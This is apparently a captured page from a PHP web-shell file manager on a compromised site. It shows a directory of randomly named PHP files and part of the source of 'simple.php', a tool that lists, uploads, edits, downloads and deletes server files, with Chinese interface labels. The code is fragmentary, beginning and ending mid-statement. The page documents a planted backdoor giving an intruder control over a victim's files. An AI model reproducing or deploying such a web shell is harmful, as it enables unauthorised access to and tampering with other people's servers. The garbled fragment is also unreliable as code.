File Manager

Files in the directory:

.ftpquota__94e56fe.htaccess.well-known__94e56feOkxob.phpSupTest.phpahax.phpcckcpbjq.phpcurl.phperdkgcil.phpfazemrx1949_Un06Netz.phpfilefuns.phpfk12stuogm.phpgmu.eduindex.phpmhnbumtw.phpotv3zagjpatqwvcl.phpphp.iniq4d7r4c4robots.txtsimple.phptesTQ4i.phptlooggiv.phpujzsxtfr.phpuxdftulx.phpwp-content__94e56fexrb6icno

Upload a File

Edit File: simple.php

'; } break; default: $root = isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : ''; $dir = __DIR__; if($path){$dir = $path;} $title = $dir; $content = '
'; foreach(hardScandir($dir) as $value){ $fullPath = str_replace('//', '/', $dir."/".$value); if($value != '.' && $value != '..' && is_dir($fullPath)){ $content .= ''; } } foreach(hardScandir($dir) as $value){ $fullPath = str_replace('//', '/', $dir."/".$value); if($value != '.' && $value != '..' && !is_dir($fullPath)){ $content .= ''; } } $content .= '
文件名权限创建时间编辑时间访问时间大小操作
'.$fullPath.''.substr(sprintf('%o', fileperms($fullPath)), -4).''.date("Y-m-d H:i:s", filectime($fullPath)).''.date("Y-m-d H:i:s", filemtime($fullPath)).''.date("Y-m-d H:i:s", fileatime($fullPath)).'文件夹
'.$fullPath.''.substr(sprintf('%o', fileperms($fullPath)), -4).''.date("Y-m-d H:i:s", filectime($fullPath)).''.date("Y-m-d H:i:s", filemtime($fullPath)).''.date("Y-m-d H:i:s", fileatime($fullPath)).''.round(filesize($fullPath) / 1024, 2).' Kb删除
全选
'; break; } function hardScandir($dir){ if(function_exists("scandir")){ return scandir($dir); }else{ $dh = opendir($dir); while(false !== ($filename = readdir($dh))) $files[] = $filename; return $files; } } function escape($uri){ return str_replace('%2F', '/', rawurlencode($uri)); }?> Simple File Manage Design by index.php
Download